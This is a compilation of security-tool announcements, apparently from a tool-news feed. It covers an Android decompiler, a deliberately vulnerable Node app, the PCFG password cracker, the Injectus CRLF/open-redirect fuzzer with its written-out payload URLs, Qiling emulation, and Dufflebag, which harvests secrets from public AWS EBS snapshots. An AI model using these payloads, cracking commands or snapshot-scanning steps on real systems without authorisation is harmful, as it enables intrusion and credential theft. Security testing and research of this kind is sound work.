XCross-referencing, locating callers (of strings, classes, methods, field, Smali, Java)
Esc/<-/BackspaceBack to the last visit
->Forward to the next visit
GJump to somewhere by you inputting offset
NRename the variable/method/class name
SSearch for all the elements by the given string
CComments. Only supports the Java code
DoubleClickThe cursor's placed at the method/str/field/class, and double-click to access objects
Mthe cursor's placed at the Smali line and pressing the key 'M' to edit the instruction
UPPress 'up' key to access the up-method in the tree control
DownPress “down” key to access the down-method in the tree control
DDump the binary data of methods, only supports the Smali window
EnterThe modification of edit boxes take effect
HShow data in Hex
Ctr+HPop searching history window
Ctr+ASelect all
Ctr+CCopy
Ctr+VPaste, only for editable boxes
Ctr+XCut
Ctr+FFind out the string of the current window
Ctr+SSave the modifications into the GDA database file

Installing
not yet, just double-click the bin and you can enjoy it.

Supported platforms
Only for windows

Usage:
brief guide: https://github.com/charles2gan/GDA-android-reversing-Tool/wiki
python script:https://github.com/charles2gan/GDA-android-reversing-Tool/wiki/GDA-Python-scripts

Shows:
File loading and decompiling:



MalScan, API search, x-ref...


Url,Xml,string x-ref...


variable trace



DVNA - Damn Vulnerable NodeJS Application

$
0
0

Damn Vulnerable NodeJS Application (DVNA) is a simple NodeJS application to demonstrate OWASP Top 10 Vulnerabilities and guide on fixing and avoiding these vulnerabilities. The fixes branch will contain fixes for the vulnerabilities. Fixes for vunerabilities OWASP Top 10 2017 vulnerabilities at fixes-2017 branch.
The application is powered by commonly used libraries such as express, passport, sequelize, etc.

Developer Security Guide book
The application comes with a developer friendly comprehensive guidebook which can be used to learn, avoid and fix the vulnerabilities. The guide available at https://appsecco.com/books/dvna-developers-security-guide/ covers the following
  1. Instructions for setting up DVNA
  2. Instructions on exploiting the vulnerabilities
  3. Vulnerable code snippets and instructions on fixing vulnerabilities
  4. Recommendations for avoid such vulnerabilities
  5. References for learning more
The blog post for this release is at https://blog.appsecco.com/damn-vulnerable-nodejs-application-dvna-by-appsecco-7d782d36dc1e

Quick start
Try DVNA using a single command with Docker. This setup uses an SQLite database instead of MySQL.
docker run --name dvna -p 9090:9090 -d appsecco/dvna:sqlite
Access the application at http://127.0.0.1:9090/

Getting Started
DVNA can be deployed in three ways
  1. For Developers, using docker-compose with auto-reload on code updates
  2. For Security Testers, using the Official image from Docker Hub
  3. For Advanced Users, using a fully manual setup
Detailed instructions on setup and requirements are given in the Guide Gitbook

Development Setup
Clone this repository
git clone https://github.com/appsecco/dvna; cd dvna
Create a vars.env with the desired database configuration
MYSQL_USER=dvna
MYSQL_DATABASE=dvna
MYSQL_PASSWORD=passw0rd
MYSQL_RANDOM_ROOT_PASSWORD=yes
Start the application and database using docker-compose
docker-compose up
Access the application at http://127.0.0.1:9090/
The application will automatically reload on code changes, so feel free to patch and play around with the application.

Using Official Docker Image
Create a file named vars.env with the following configuration
MYSQL_USER=dvna
MYSQL_DATABASE=dvna
MYSQL_PASSWORD=passw0rd
MYSQL_RANDOM_ROOT_PASSWORD=yes
MYSQL_HOST=mysql-db
MYSQL_PORT=3306
Start a MySQL container
docker run --name dvna-mysql --env-file vars.env -d mysql:5.7
Start the application using the official image
docker run --name dvna-app --env-file vars.env --link dvna-mysql:mysql-db -p 9090:9090 appsecco/dvna
Access the application at http://127.0.0.1:9090/ and start testing!

Manual Setup
Clone the repository
git clone https://github.com/appsecco/dvna; cd dvna
Configure the environment variables with your database information
export MYSQL_USER=dvna
export MYSQL_DATABASE=dvna
export MYSQL_PASSWORD=passw0rd
export MYSQL_HOST=127.0.0.1
export MYSQL_PORT=3306
Install Dependencies
npm install
Start the application
npm start
Access the application at http://localhost:9090

TODO
  • Link commits to fixes in documentation
  • Add new vulnerabilities from OWASP Top 10 2017
  • Improve application features, documentation

Thanks
Abhisek Datta - abhisek for application architecture and front-end code


PCFG Cracker - Probabilistic Context Free Grammar (PCFG) Password Guess Generator

$
0
0

PCFG = Probabilistic Context Free Grammar
PCFG = Pretty Cool Fuzzy Guesser
In short: A collection of tools to perform research into how humans generate passwords. These can be used to crack password hashes, but also create synthetic passwords (honeywords), or help develop better password strength algorithms

Documentation

Academic Papers:
Original 2009 IEEE Security and Privacy paper on PCFGs for password cracking: https://ieeexplore.ieee.org/abstract/document/5207658
My 2010 dissertation which describes several advanced features such as the updated "next" algorithm: https://diginole.lib.fsu.edu/islandora/object/fsu%3A175769
Comparative Analysis of Three Language Spheres: Are Linguistic and Cultural Differences Reflected in Password Selection Habits? Authors: Keika Mori, Takuya Watanabe, Yunao Zhou, Ayako Akiyama Hasegawa, Mitsuaki Akiyama and Tatsuya Mori: https://nsl.cs.waseda.ac.jp/wp-content/uploads/2019/07/EuroUSEC19-mori.pdf

Wiki
Since it does not require pushing new versions to update it, the wiki is a source of random notes about this project: https://github.com/lakiw/pcfg_cracker/wiki

Documents Folder
Several documents can also be found in the Documents folder of this repository.
  • pcfg_next_function_overview.pptx: A slide deck talking about the PCFG next function. The intended audience for this is developers and academic researchers.

Overview
This project uses machine learning to identify password creation habits of users. A PCFG model is generated by training on a list of disclosed plaintext/cracked passwords. In the context of this project, the model is referred to as a ruleset and contains many different parts of the passwords identified during training, along with their associated probabilities. This stemming can be useful for other cracking tools such as PRINCE, and/or parts of the ruleset can be directly incorporated into more traditional dictionary-based attacks. This project also includes a PCFG guess generator that makes use of this ruleset to generate password guesses in probability order. This is much more powerful than standard dictionary attacks, and in testing has proven to be able to crack passwords on average with significantly less guesses than other publicly available methods. The downside is that generating guesses in probability order is slow, meaning it is creating on average 50-100k guesses a second, where GPU based algorithms can create millions to billions (and up), of guesses a second against fast hashing algorithms. Therefore, the PCFG guesser is best used against large numbers of salted hashes, or other slow hashing algorithms, where the performance cost of the algorithm is made up for with the accuracy of the guesses.

Requirements + Installation
  • Python3 is the only hard requirement for these tools
  • It is highly recommended that you install the chardet python3 library for training. While not required, it performs character encoding autodetection of the training passwords. To install it:
  • Download the source from https://pypi.python.org/pypi/chardet
  • Or install it using pip3 install chardet

Quick Start Guide

Training
The default ruleset included in this repo was created by training on a 1 million password subset of the RockYou dataset. Better performance can be achieved by training on the full 32 million password set for RockYou, but that was excluded to keep the download size small. You can use the default ruleset to start generating passwords without having to train on a new list, but it is recommended to train on a target set of passwords that may be closer to what you are trying to target. If you do create your own ruleset, here is a quick guide:
  1. Identify a set of plaintext passwords to train on.
  • This passwords set should include duplicate passwords. That way the trainer can identify common passwords like 123456 are common.
  • The passwords should be in plaintext with hashes and associated info like usernames removed from them. Don't try to use raw .pot files as your training set as the hashes will be considered part of the password by the training program.
  • The passwords should be encoded the same way you want to generate password guesses as. So, if you want to create UTF-8 password guesses, the training set should also be encoded as UTF-8. Long term, the ability to modify this when generating guesses is on the development plan, but that feature is currently not supported.
  • The training password list should be between 100k and 50 million. Testing is still being done on how the size of the training password list affects guess generation, and there has been good success even with password lists as small as 10k, but an ideal size is likely around 1 million, with diminishing returns after that.
  • For the purposes of this tutorial the input password list will be referred to as INPUT_PASSWORD_LIST
  1. Choose a name for your generated ruleset. For the purposes of this tutorial it will be NEW_RULESET
  2. Run the trainer on the input password list
  • python3 trainer.py -t INPUT_PASSWORD_LIST -r NEW_RULESET
  • Common optional flags: a. coverage: How much you trust the training set to match the target passwords. A higher coverage means to use less intelligent brute force generation using Markov modeling, (currently using the OMEN algorithm). If you set coverage to 1, no brute force will be performed. If you set coverage to 0, it will only generate guesses using Markov attacks. This value is a float, with the default being 0.6 which means it expects a 60% chance the target password's base words can be found in the training set. Example: python3 trainer.py -t INPUT_PASSWORD_LIST -r NEW_RULESET -c 0.6 b. --save_sensitive: If this is specified, sensitive data such as e-mail addresses and full websites which are discovered during training will be saved in the ruleset. While the PCFG guess generator does not currently make use of this data, it is very valuable during a real password cracking attack. This by default is off to make this tool easier to use in an academic setting. Note, even when this is off, there will almost certainly still be PII data saved inside a ruleset, so protect generated rulesets appropriately. Example: python3 trainer.py -t INPUT_PASSWORD_LIST -r NEW_RULESET --save_sensitive c. --comments: Adds a comment to your ruleset config file. This is useful so you know why and how you generated your ruleset when looking back at it later. Include the comment you want to add in quotes.

Guess Generation
This generates guesses to stdout using a previously training PCFG ruleset. These guesses can then be piped into any program that you want to make use of them. If no ruleset is specified, the default ruleset DEFAULT will be used. For the purposes of this guide it will assume the ruleset being used is NEW_RULESET.
  1. Note: the guess generation program is case sensitive when specifying the ruleset name.
  • A session name is not required, (it will by default create a session called default_run), but it is helpful to make restarting a paused/stopped session easier. These examples will use the session name SESSION_NAME. Note, there is no built in sanity check if you run multiple sessions with the same name at the same time, but it is recommend to avoid that.
  1. To start a new guessing session run:
  • python3 pcfg_guesser.py -r NEW_RULESET -s SESSION_NAME
  1. To restart a previous guessing session run:
  • python3 pcfg_guesser.py -s SESSION_NAME --load

Password Strength Scoring
There are many cases where you may want to estimate the probability of a password being generated by a previously trained ruleset. For example, this could be part of a password strength metric, or used for other research purposes. A sample program has been included to perform this.
  • INPUT_LIST represents the list of passwords to score. These passwords should be plaintext, and separated by newlines, with one password per line.
  1. To run a scoring session: python3 password_scorer -r NEW_RULESET -i INPUT_LIST
  2. By default. it will output the results to stdout, with each password scored per line
  • The first value is the raw password
  • The second value will represent if the input value was scored a 'password', 'website', 'e-mail address', or 'other'. This determination of password or other is dependent on the limits you set for both OMEN guess limit, as well as probability associated with the PCFG.
  • The third value is the probability of the password according to the Ruleset. If it is assigned a value of 0.0, that means that the password will not be generated by the ruleset, though it may be generated by a Markov based attack
  • The fourth value is the OMEN level that will generate the password. A value of -1 means the password will not be generated by OMEN.

Prince-Ling Wordlist Generator
**Name: **PRINCE Language Idexed N-Grams (Prince-Ling)
Overview: Constructs customized wordlists based on an already trained PCFG ruleset/grammar for use in PRINCE style combinator attacks. The idea behind this was since the PCFG trainer is already breaking up a training set up passwords into individual parsings, that information could be leveraged to make targeted wordlists for other attacks.
Basic Mechanics: Under the hood, the Prince-Ling tool is basically a mini-PCFG guess generator. It strips out the Markov guess generation, and replaces the base structures used in normal PCFG attacks with a significantly reduced base-structure tailored for generating PRINCE wordlists. This allows generating dictionary words in probability order with an eye to how useful those words are expected to be in a PRINCE attack.
Using Prince-Ling
  1. Train a PCFG ruleset using trainer.py. Note you need to create the ruleset using version 4.1 or later of the PCFG toolset, as earlier versions did not learn all the datastructures that Prince-Ling utilizes.
  2. Run Prince-Ling python3 prince-ling.py -r RULESET_NAME -s SIZE_OF_WORDLIST_TO_CREATE -o OUTPUT_FILENAME
  • --rule: Name of the PCFG ruleset to create the PRINCE wordlist from
  • --size: Number of words to create for the PRINCE wordlist. Note, if not specified, Prince-Ling will generate all possible words which can be quite large depending on if case_mangling is enabled. (Case mangling increases the keyspace enourmously)
  • --output: Output filename to write entrees to. Note, if not specified, Prince-Ling will output words to stdout, which may cause problems depending on what shell you are using when printing non-ASCII characters.
  • --all_lower: Only generate lowercase words for the PRINCE dictionary. This is useful when attacking case-insensitive hashes, or if you plan on applying targeted case mangling a different way.

Example Cracking Passwords Using John the Ripper
python3 pcfg_guesser -r NEW_RULESET -s SESSION_NAME | ./john --stdin --format=bcrypt PASSWORDS_TO_CRACK.txt

Contributing
If you notice any bugs, or if you have a feature you would like to see added, please open an issue on this github page. I also accept pull requests, though ideally please link a pull request to an issue so that I can more easily review it, ask questions, and better understand the changes you are making.
There's a lot of improvements that can be made to modeling password creation strategies using PCFGs. I'm very open to new ideas, changes, and suggestions. Just because the code currently does something a certain way doesn't mean that's the best option. For example, the fundamental base_structure of the current approach where masks are generated for alpha strings, digits, other, etc, was chosen because it was the "easiest" option to impliment. My team had a lot of debate that a better option might be to start with a base word, and then model more traditional mangling rules applied to it as transisions in the PCFG. So feel free to go wild with this code!


Injectus - CRLF And Open Redirect Fuzzer

$
0
0

Simple python tool that goes through a list of URLs trying CRLF and open redirect payloads.

▪ ▐ ▄ ▐▄▄▄▄▄▄ . ▄▄· ▄▄▄▄▄▄• ▄▌.▄▄ ·
██ •█▌▐█ ·██▀▄.▀·▐█ ▌▪•██ █▪██▌▐█ ▀.
▐█·▐█▐▐▌▪▄ ██▐▀▀▪▄██ ▄▄ ▐█.▪█▌▐█▌▄▀▀▀█▄
▐█▌██▐█▌▐▌▐█▌▐█▄▄▌▐███▌ ▐█▌·▐█▄█▌▐█▄▪▐█
▀▀▀▀ ██▪ ▀▀▀• ▀▀▀ ·▀▀▀ ▀▀▀ ▀▀▀ ▀▀▀▀
~ BOUNTYSTRIKE ~

usage: Injectus [-h] [-f FILE] [-u URL] [-r] [-w WORKERS] [-t TIMEOUT]
[-d DELAY] [-c] [-op]

CRLF and open redirect fuzzer. Crafted by @dubs3c.

optional arguments:
-h, --help show this help message and exit
-f FILE, --file FILE File containing URLs
-u URL, --url URL Single URL to test
-r, --no-request Only build attack list, do not perform any requests
-w WORKERS, --workers WORKERS
Amount of asyncio workers, default is 10
-t TIMEOUT, --timeout TIMEOUT
HTTP request timeout, default is 6 seconds
-d DELAY, --delay DELAY
The delay between requests, default is 1 second
-c, --crlf Only perform crlf attacks
-op, --openredirect Only perform open redirect attacks

Motivation
Needed a simple CRLF/open redirect scanner that I could include into my bug bounty pipeline at https://github.com/BountyStrike/Bountystrike-sh. Didn't find any tools that satisfied my need, so I created Injectus. It's a little bit of an experiment, to see if it works better than other tools.

Design
If we have the following URL:
https://dubell.io/?param1=value1&url=value2&param3=value3
For CRLF attacks, Injectus will inject every payload once into the value of one parameter, for every n parameters. For example, Injectus will create the following list with the URL above:
https://dubell.io/?param1=%%0a0abounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%0abounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%0d%0abounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%0dbounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%23%0dbounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%25%30%61bounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%25%30abounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%250abounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%25250abounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%3f%0dbounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%u000abounty:strike&url=value2&param3=value3

https://dubell.io/?param1=value1&url=%%0a0abounty:strike&param3 =value3
https://dubell.io/?param1=value1&url=%0abounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%0d%0abounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%0dbounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%23%0dbounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%25%30%61bounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%25%30abounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%250abounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%25250abounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%3f%0dbounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%u000abounty:strike&param3=value3

https://dubell.io/?param1=value1&url=value2&param3=%%0a0abounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%0abounty: strike
https://dubell.io/?param1=value1&url=value2&param3=%0d%0abounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%0dbounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%23%0dbounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%25%30%61bounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%25%30abounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%250abounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%25250abounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%3f%0dbounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%u000abounty:strike
As you can see, every CRLF payload is injected in the first parameter's value. Once the loop is done, Injectus will inject every payload into the second parameter, and so on. Once all parameters have been injected, the list is complete.
If there are no query parameters, Injectus will simply append each payload to the URL, like so:
https://dubell.io/some/path/%%0a0abounty:strike
https://dubell.io/some/path/%0abounty:strike
https://dubell.io/some/path/%0d%0abounty:strike
https://dubell.io/some/path/%0dbounty:strike
https://dubell.io/some/path/%23%0dbounty:strike
https://dubell.io/some/path/%23%0dbounty:strike
https://dubell.io/some/path/%25%30%61bounty:strike
https://dubell.io/some/path/%25%30abounty:strike
https://dubell.io/some/path/%250abounty:strike
https://dubell.io/some/path/%25250abounty:strike
https://dubell.io/some/path/%3f%0dbounty:strike
https://dubell.io/some/path/%3f%0dbounty:strike
https://dubell.io/some/path/%u000abounty:strike
When injecting open redirect payloads, Injectus will only inject a payload if there exists a query/path parameter containing a typical redirect keyword, e.g. url. Injecting into the following URL https://dubell.io/?param1=value1&url=dashboard&param3=value3:
https://dubell.io/?param1=value1&url=$2f%2fbountystrike.io%2f%2fparam3=value3
https://dubell.io/?param1=value1&url=%2f$2fbountystrike.ioparam3=value3
https://dubell.io/?param1=value1&url=%2fbountystrike.io%2f%2fparam3=value3
https://dubell.io/?param1=value1&url=%2fbountystrike.io//param3=value3
https://dubell.io/?param1=value1&url=%2fbountystrike.ioparam3=value3
https://dubell.io/?param1=value1&url=////bountystrike.ioparam3=value3
https://dubell.io/?param1=value1&url=///bountystrike.ioparam3=value3
https://dubell.io/?param1=value1&url=//bountystrike.ioparam3=value3
https://dubell.io/?param1=value1&url=/\x08ountystrike.ioparam3=value3
https://dubell.io/?param1=value1&url=/bountystrike.ioparam3=value3
https://dubell.io/?param1=value1&url=/http://bountystrike.ioparam3=value3
https://dubell.io/?param1=value1&url=bountystrike.ioparam3=value3
The URL contains the query parameter url, so Injectus will inject the payloads into that parameter.
An example when using path parameters. Original URL is https://dubell.io/some/path/that/redirect/dashboard:
https://dubell.io/some/path/that/redirect/$2f%2fbountystrike.io%2f%2f
https://dubell.io/some/path/that/redirect/%2f$2fbountystrike.io
https://dubell.io/some/path/that/redirect/%2fbountystrike.io%2f%2f
https://dubell.io/some/path/that/redirect/%2fbountystrike.io
https://dubell.io/some/path/that/redirect/%2fbountystrike.io//
https://dubell.io/some/path/that/redirect/////bountystrike.io
https://dubell.io/some/path/that/redirect////bountystrike.io
https://dubell.io/some/path/that/redirect///bountystrike.io
https://dubell.io/some/path/that/redirect//\x08ountystrike.io
https://dubell.io/some/path/that/redirect//bountystrike.io
https://dubell.io/some/path/that/redirect//http://bountystrike.io
https://dubell.io/some/path/that/redirect/bountystrike.io
As before, if no query parameters or path parameters are found, Injectus will simply append each payload to the URL:
https://dubell.io/$2f%2fbountystrike.io%2f%2f
https://dubell.io/%2f$2fbountystrike.io
https://dubell.io/%2fbountystrike.io%2f%2f
https://dubell.io/%2fbountystrike.io
https://dubell.io/%2fbountystrike.io//
https://dubell.io/////bountystrike.io
https://dubell.io////bountystrike.io
https://dubell.io///bountystrike.io
https://dubell.io//\\bountystrike.io
https://dubell.io//bountystrike.io
https://dubell.io//http://bountystrike.io
https://dubell.io/bountystrike.io

Installation
pip3.7 install -r requirements.txt --user


WhatTheHack - A Collection Of Challenge Based Hack-A-Thons Including Student Guide, Proctor Guide, Lecture Presentations, Sample/Instructional Code And Templates

$
0
0

WhatTheHack is a collection of challenge based hack-a-thons including student guide, proctor guide, lecture presentations, sample/instructional code and templates.

What, Why and How
  • "What the Hack" is a challenge based hackathon format
  • Challenges describe high-level tasks and goals to be accomplished
  • Challenges are not step-by-step labs
  • Attendees work in teams of 3 to 5 people to solve the challenges
  • Attendees "learn from" and "share with" each other
  • By having to "figure it out", attendee knowledge retention is greater
  • Proctors provide guidance, but not answers to the teams
  • Emcees provide lectures & demos to setup challenges & review solutions
  • What the Hack can be hosted in-person or virtually via MS Teams

How to Add Your Hack
We welcome all new hacks! The process for doing this is:
  • Fork this repo into your own github account
  • Create a new branch for your work
  • Add a new top level folder using the next number in sequence, eg:
    • 011-BigNewHack
  • Within this folder, create two folders, each with two folders with in that looks like this:
    • Host
      • Guides
      • Solutions
    • Student
      • Guides
      • Resources
  • The content of each folder should be:
    • Student/Guides: The Student's Guide
    • Student/Resources: Any template or "starter" files that students may need in challenges
    • Host/Guides: The Proctor's Guide lives here as well as any Lecture slide decks
    • Host/Solutions: Specific files that the proctors might need that have solutions in them.
  • Once your branch and repo have all your content and it formatted correctly, follow the instructions on this page to submit a pull request back to the main repository:


Nfstream - A Flexible Network Data Analysis Framework

$
0
0

nfstream is a Python package providing fast, flexible, and expressive data structures designed to make working with online or offline network data both easy and intuitive. It aims to be the fundamental high-level building block for doing practical, real world network data analysis in Python. Additionally, it has the broader goal of becoming a common network data processing framework for researchers providing data reproducibility across experiments.

Main Features
  • Performance:nfstream is designed to be fast (x10 faster with pypy3 support) with a small CPU and memory footprint.
  • Layer-7 visibility:nfstreamdeep packet inspection engine is based on nDPI. It allows nfstream to perform reliable encrypted applications identification and metadata extraction (e.g. TLS, QUIC, TOR, HTTP, SSH, DNS).
  • Flexibility: add a flow feature in 2 lines as an NFPlugin.
  • Machine Learning oriented: add your trained model as an NFPlugin.

How to use it?
  • Dealing with a big pcap file and just want to aggregate it as network flows? nfstream make this path easier in few lines:
   from nfstream import NFStreamer
my_awesome_streamer = NFStreamer(source="facebook.pcap") # or network interface (source="eth0")
for flow in my_awesome_streamer:
print(flow) # print it, append to pandas Dataframe or whatever you want :)!
    NFEntry(
id=0,
first_seen=1472393122365,
last_seen=1472393123665,
version=4,
src_port=52066,
dst_port=443,
protocol=6,
vlan_id=0,
src_ip='192.168.43.18',
dst_ip='66.220.156.68',
total_packets=19,
total_bytes=5745,
duration=1300,
src2dst_packets=9,
src2dst_bytes=1345,
dst2src_packets=10,
dst2src_bytes=4400,
expiration_id=0,
master_protocol=91,
app_protocol=119,
application_name='TLS.Facebook',
category_name='SocialNetwork',
client_info='facebook.com',
server_info='*.facebook.com',
j3a_client='bfcc1a3891601edb4f137ab7ab25b840',
j3a_server='2d1eb5817ece335c24904f516ad5da12'
)
  • From pcap to Pandas DataFrame?
    import pandas as pd 
streamer_awesome = NFStreamer(source='devil.pcap')
data = []
for flow in streamer_awesome:
data.append(flow.to_namedtuple())
my_df = pd.DataFrame(data=data)
my_df.head(5) # Enjoy!
  • Didn't find a specific flow feature? add a plugin to nfstream in few lines:
    from nfstream import NFPlugin

class my_awesome_plugin(NFPlugin):
def on_update(self, obs, entry):
if obs.length >= 666:
entry.my_awesome_plugin += 1

streamer_awesome = NFStreamer(source='devil.pcap', plugins=[my_awesome_plugin()])
for flow in streamer_awesome:
print(flow.my_awesome_plugin) # see your dynamically created metric in generated flows
  • More example and details are provided on the official documentation.

Prerequisites
    apt-get install libpcap-dev

Installation

Using pip
Binary installers for the latest released version are available:
    pip3 install nfstream

Build from source
If you want to build nfstream on your local machine:
    git clone https://github.com/aouinizied/nfstream.git
cd nfstream
python3 setup.py install

Contributing
Please read Contributing for details on our code of conduct, and the process for submitting pull requests to us.

Authors
Zied Aouini created nfstream and these fine people have contributed.

Ethics
nfstream is intended for network data research and forensics. Researchers and network data scientists can use these framework to build reliable datasets, train and evaluate network applied machine learning models. As with any packet monitoring tool, nfstream could potentially be misused. Do not run it on any network of which you are not the owner or the administrator.



Qiling - Advanced Binary Emulation Framework

$
0
0

Qiling is an advanced binary emulation framework, with the following features:
  • Cross platform: Windows, MacOS, Linux, BSD
  • Cross architecture: X86, X86_64, Arm, Arm64, Mips
  • Multiple file formats: PE, MachO, ELF
  • Emulate & sandbox machine code in a isolated environment
  • Provide high level API to setup & configure the sandbox
  • Fine-grain instrumentation: allow hooks at various levels (instruction/basic-block/memory-access/exception/syscall/IO/etc)
  • Allow dynamic hotpatch on-the-fly running code, including the loaded library
  • True framework in Python, making it easy to build customized security analysis tools on top
Qiling is backed by Unicorn engine.
Visit website https://www.qiling.io for more information.

Qiling vs other Emulators
There are many open source emulators, but two projects closest to Qiling are Unicorn& Qemu usermode. This section explains the main differences of Qiling against them.

Qiling vs Unicorn engine
Built on top of Unicorn, but Qiling & Unicorn are two different animals.
  • Unicorn is just a CPU emulator, so it focuses on emulating CPU instructions, that can understand emulator memory. Beyond that, Unicorn is not aware of higher level concepts, such as dynamic libraries, system calls, I/O handling or executable formats like PE, MachO or ELF. As a result, Unicorn can only emulate raw machine instructions, without Operating System (OS) context.
  • Qiling is designed as a higher level framework, that leverages Unicorn to emulate CPU instructions, but can understand OS: it has executable format loaders (for PE, MachO & ELF at the moment), dynamic linkers (so we can load & relocate shared libraries), syscall & IO handlers. For this reason, Qiling can run executable binary without requiring its native OS.

Qiling vs Qemu usermode
Qemu usermode does similar thing to our emulator, that is to emulate whole executable binaries in cross-architecture way. However, Qiling offers some important differences against Qemu usermode.
  • Qiling is a true analysis framework, that allows you to build your own dynamic analysis tools on top (in friendly Python language). Meanwhile, Qemu is just a tool, not a framework.
  • Qiling can perform dynamic instrumentation, and can even hotpatch code at runtime. Qemu does not do either.
  • Not only working cross-architecture, Qiling is also cross-platform, so for example you can run Linux ELF file on top of Windows. In contrast, Qemu usermode only run binary of the same OS, such as Linux ELF on Linux, due to the way it forwards syscall from emulated code to native OS.
  • Qiling supports more platforms, including Windows, MacOS, Linux & BSD. Qemu usermode can only handles Linux & BSD.

Install
Run below command line to install Qiling (Python3 is required).
python3 setup.py install

Examples
  • Below example shows how to use Qiling framework to emulate a Windows EXE on a Linux machine.
from qiling import *

# sandbox to emulate the EXE
def my_sandbox(path, rootfs):
# setup Qiling engine
ql = Qiling(path, rootfs)
# now emulate the EXE
ql.run()

if __name__ == "__main__":
# execute Windows EXE under our rootfs
my_sandbox(["examples/rootfs/x86_windows/bin/x86-windows-hello.exe"], "examples/rootfs/x86_windows")
  • Below example shows how to use Qiling framework to dynamically patch a Windows crackme, make it always display "Congratulation" dialog.
from qiling import *

def force_call_dialog_func(ql):
# get DialogFunc address
lpDialogFunc = ql.unpack32(ql.mem_read(ql.sp - 0x8, 4))
# setup stack memory for DialogFunc
ql.stack_push(0)
ql.stack_push(1001)
ql.stack_push(273)
ql.stack_push(0)
ql.stack_push(0x0401018)
# force EIP to DialogFunc
ql.pc = lpDialogFunc


def my_sandbox(path, rootfs):
ql = Qiling(path, rootfs)
# NOP out some code
ql.patch(0x004010B5, b'\x90\x90')
ql.patch(0x004010CD, b'\x90\x90')
ql.patch(0x0040110B, b'\x90\x90')
ql.patch(0x00401112, b'\x90\x90')
# hook at an address with a callback
ql.hook_address(0x00401016, force_call_dialog_func)
ql.run()


if __name__ == "__main__":
my_sandbox(["rootfs/x86_windows/bin/Easy_CrackMe.exe"], "rootfs/x86_windows")
The below Youtube video shows how the above example works.


Wannacry demo
  • The below Youtube video shows how Qiling analyzes Wannacry malware.


Qltool
Qiling also provides a friendly tool named qltool to quickly emulate shellcode & executable binaries.
To emulate a binary, run:
$ ./qltool run -f examples/rootfs/arm_linux/bin/arm32-hello --rootfs examples/rootfs/arm_linux/
To run shellcode, run:
$ ./qltool shellcode --os linux --arch x86 --asm -f examples/shellcodes/lin32_execve.asm

Core developers


Dufflebag - Search Exposed EBS Volumes For Secrets

$
0
0
Dufflebag is a tool that searches through public Elastic Block Storage (EBS) snapshots for secrets that may have been accidentally left in. You may be surprised by all the passwords and secrets just laying around!
The tool is organized as an Elastic Beanstalk ("EB", not to be confused with EBS) application, and definitely won't work if you try to run it on your own machine.
Dufflebag has a lot of moving pieces because it's fairly nontrivial to actually read EBS volumes in practice. You have to be in an AWS environment, clone the snapshot, make a volume from the snapshot, attach the volume, mount the volume, etc... This is why it's made as an Elastic Beanstalk app, so it can automagically scale up or down however much you like, and so that the whole thing can be easily torn down when you're done with it.
Just keep an eye on your AWS console to make sure something it's going haywire and racking up bills. We've tried to think of every contingency and provide error handling... but you've been warned!

Getting Started

Permissions
You'll need to add some additional AWS IAM permissions to the role: aws-elasticbeanstalk-ec2-role. Alternatively, you can make a whole new role with these permissions and set EB to use that role, but it's a little more involved. In any case, you'll need to add:
  • AttachVolume (ec2)
  • CopySnapshot (ec2)
  • CreateVolume (ec2)
  • DeleteSnapshot (ec2)
  • DeleteVolume (ec2)
  • DescribeSnapshots (ec2)
  • DescribeVolumes (ec2)
  • DetachVolume (ec2)
  • PurgeQueue (sqs)
  • ListQueues (sqs)
  • ListAllMyBuckets (s3)
  • PutObject (s3)

Building
The core application is written in Go, so you'll need a Golang compiler. But the EB application is actually built into a .zip file (that's just how EB works) so the makefile will output a zip for you.
  1. Check your region. Dufflebag can only operate in one AWS region at a time. If you want to search every region, you'll have to deploy that many instances. To change the region, change the contents of the source code file region.go.
  2. Install dependencies: Ubuntu 18.04 x64:
sudo apt install make golang-go git
go get -u github.com/aws/aws-sdk-go
go get -u github.com/deckarep/golang-set
go get -u github.com/lib/pq
  1. Then build the EB app into a zip file with:
make
You should now see a dufflebag.zip file in the root project directory.
  1. Lastly, you'll need to make an S3 bucket. Setting this up automatically within Dufflebag might be possible, but it'd actually be pretty hard. So just do it yourself. You just need to make an S3 bucket with default permissions, and have the name start with dufflebag. S3 bucket names have to be globally unique, so you'll probably need to have some suffix that is a bunch of gibberish or something.

Deploying to Elastic Beanstalk
Go to your AWS console and find the Elastic Beanstalk menu option. This is probably doable via the CLI too, but this description will use the console. Select Actions -> Create Environment.



Then in the next window choose Worker environment and hit Select.


In the next window, choose Preconfigured -> Go for the Platform.


Under Application Code, choose Upload your Code.


Hit the Upload button and select the dufflebag.zip that you just built.


Finally, hit Create Environment to get starting.
It will take a few minutes for AWS to make all the things and get started. Once created, Dufflebag will get started right away. No need to do anything else.

Remove the Safety Valve
Once you have this up and running, you can try again with the safety valve removed. By default, Dufflebag only searches 20 EBS snapshots. (So that it doesn't go haywire on your very first try) In order to widen the search to the entire region, go into populate.go, remove the following line of code, and rebuild:
//#####################################################################
//#### Safety Valve ####
//#### Remove this line of code below to search all of your region ####
//#####################################################################
snapshots = snapshots_result.Snapshots[0:20]

Scaling Up
